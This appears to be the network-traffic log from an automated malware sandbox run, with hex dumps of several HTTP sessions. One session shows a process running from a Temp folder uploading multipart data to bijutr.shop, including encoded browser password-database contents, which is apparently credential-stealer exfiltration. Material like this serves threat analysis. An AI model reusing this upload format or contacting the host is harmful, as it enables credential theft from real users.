                                                                                                                                                                                                                                                                                      2024-12-27 06:10:31 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Content-Length: 154477
                                                                                                                                                                                                                                                                                      X-GUploader-UploadID: AFiumC7tH5ZzJMfNfa9BIZr8250lXMXmPl3ep-Vo_9n3cA_0tj0h-vy5u0X0e4GXYF7rzyXp
                                                                                                                                                                                                                                                                                      X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                      Server: UploadServer
                                                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                      Expires: Fri, 26 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                      Age: 51137
                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                      ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                      Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                      Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                                                      Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                                                                                      Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                                      Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                                      Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                                      Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                                      Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                                      Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                                      Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                                      Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      26192.168.2.749855172.64.41.34432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:32 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                      CF-RAY: 8f8725e998b1ef9f-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:32 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 e6 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomPc)


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      27192.168.2.749857188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:33 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----5PP8Q9ZUA1NYMY5FCTR1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 68733
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:33 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------5PP8Q9ZUA1NYMY5FCTR1Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------5PP8Q9ZUA1NYMY5FCTR1Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------5PP8Q9ZUA1NYMY5FCTR1Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:33 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                      Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
